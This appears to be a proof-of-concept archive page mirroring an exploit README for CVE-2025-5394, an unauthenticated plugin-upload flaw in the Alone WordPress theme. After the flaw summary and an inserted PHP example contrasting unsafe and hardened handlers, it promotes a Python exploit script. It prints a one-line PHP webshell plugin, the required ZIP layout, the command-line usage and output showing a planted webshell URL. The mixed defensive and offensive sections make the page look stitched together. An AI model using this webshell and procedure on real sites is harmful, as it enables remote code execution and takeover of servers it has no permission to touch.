Related vulnerability
Title:
WordPress plugin Alone security vulnerability
(CVE-2025-5394)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform written in PHP; it lets users host a personal blog on a server running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Alone 7.8.3 and earlier versions contain a security vulnerability caused by a missing capability check in the function alone_import_pack_install_plugin, which may lead to arbitrary file upload.
Description
Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation
Introduction
# 🚨 CVE-2025-5394 - Unauthenticated Arbitrary Plugin Upload in Alone Theme
## 📌 Affected Product:
**Alone – Charity Multipurpose Non-profit WordPress Theme**
**Versions:** <= 7.8.3
**CVE:** CVE-2025-5394
**CVSS Score:** 9.8 (Critical)
## 🔥 Vulnerability Summary:
The Alone theme for WordPress is vulnerable to **arbitrary file uploads** due to a **missing capability check** on the `alone_import_pack_install_plugin()` function.
This flaw allows **unauthenticated attackers** to **upload ZIP files** (disguised as plugins) from **remote locations**, potentially achieving **remote code execution**.
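The root cause described above is a generic WordPress secure-coding failure: an AJAX handler that installs a plugin from a remote URL is reachable without a session and never asks who is calling. The following illustrative PHP is an added example for defenders and theme developers; it is not code from the Alone theme or from this repository, and every function, hook and action name in it (`example_install_plugin_*`, `plugin_url`, the nonce name) is hypothetical. It places the unsafe pattern beside the hardened form that WordPress core APIs make available (`check_ajax_referer`, `current_user_can('install_plugins')`, `wp_send_json_error`).

```php
<?php
/*
 * Illustrative example (not the Alone theme's code, not this repository's code):
 * how a plugin-install AJAX handler becomes an unauthenticated arbitrary-upload
 * sink when it lacks a capability check, and what the hardened handler looks like.
 * All function, hook and parameter names below are hypothetical.
 */

// UNSAFE PATTERN: a wp_ajax_nopriv_ hook makes WordPress invoke the handler for
// visitors with no session at all, and the handler fetches and installs whatever
// ZIP URL it is given without checking capability or nonce.
add_action( 'wp_ajax_nopriv_example_install_plugin', 'example_install_plugin_unsafe' );
add_action( 'wp_ajax_example_install_plugin',        'example_install_plugin_unsafe' );

function example_install_plugin_unsafe() {
    $zip_url = isset( $_POST['plugin_url'] ) ? $_POST['plugin_url'] : '';
    example_do_plugin_install( $zip_url );   // no capability check, no nonce check
    wp_send_json_success();
}

// HARDENED PATTERN: register for logged-in callers only (no nopriv hook), verify
// a nonce bound to this action, and require the capability that governs plugin
// installation before touching the filesystem.
add_action( 'wp_ajax_example_install_plugin_fixed', 'example_install_plugin_fixed' );

function example_install_plugin_fixed() {
    // Dies with a 403 unless the request carries a valid nonce for this action (CSRF defence).
    check_ajax_referer( 'example_install_plugin_nonce', 'nonce' );

    // 'install_plugins' is the core capability behind Plugins > Add New;
    // by default only administrators (or super admins on multisite) hold it.
    if ( ! current_user_can( 'install_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    $zip_url = isset( $_POST['plugin_url'] )
        ? esc_url_raw( wp_unslash( $_POST['plugin_url'] ) )
        : '';
    if ( '' === $zip_url ) {
        wp_send_json_error( array( 'message' => 'Missing plugin URL.' ), 400 );
    }

    $result = example_do_plugin_install( $zip_url );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }
    wp_send_json_success();
}

// Shared installer built on core upgrader classes, included so both handlers are complete.
function example_do_plugin_install( $zip_url ) {
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/file.php';

    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    return $upgrader->install( $zip_url );   // WP_Error on failure, true on success
}
```

When auditing a theme or plugin for this class of bug, the two things to look for are exactly what the contrast above shows: a `wp_ajax_nopriv_` registration (or an `admin_init`/REST route with `permission_callback => '__return_true'`) on an action that performs a privileged operation, and the absence of a `current_user_can()` check for a capability appropriate to that operation.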
---
## ⚙️ Exploit Script (Python)
This repository contains a Python script that **automates the exploitation** of CVE-2025-5394.
The script triggers the vulnerable AJAX action and uploads a fake plugin (containing a webshell) directly to the WordPress server.
---
## 📁 Webshell Requirements:
The uploaded **ZIP file** must follow this structure:
```
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php
```
Where:
- `shell_plugin` is the plugin directory.
- `shell_plugin.php` is a valid PHP plugin file **with a plugin header**.
- The PHP file can contain a webshell payload.
Example of minimal plugin header inside `shell_plugin.php`:
```php
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
```
---
## 🚀 Example Usage:
```bash
python3 CVE-2025-5394.py --help
```
```
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)
```
---
## ✅ Successful Output:
```bash
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
```
---
## ⚠️ Disclaimer:
This script is provided **for educational and research purposes only**.
The author is **not responsible** for any misuse or illegal activity conducted using this code.
Use it **only on systems you own or have explicit permission to test**.
---
## 👨💻 By:
**Nxploited ( Khaled Alenazi )**
GitHub: [https://github.com/Nxploited](https://github.com/Nxploited)
File snapshot
[4.0K] /data/pocs/706c95526fcf4b5ec3ab7909fa5d4f7b63d1c64a
├── [3.5K] CVE-2025-5394.py
├── [1.5K] LICENSE
├── [2.5K] README.md
└── [ 9] requirements.txt
0 directories, 4 files
Notes
1. It is recommended to access the original source first.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong (神龙) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.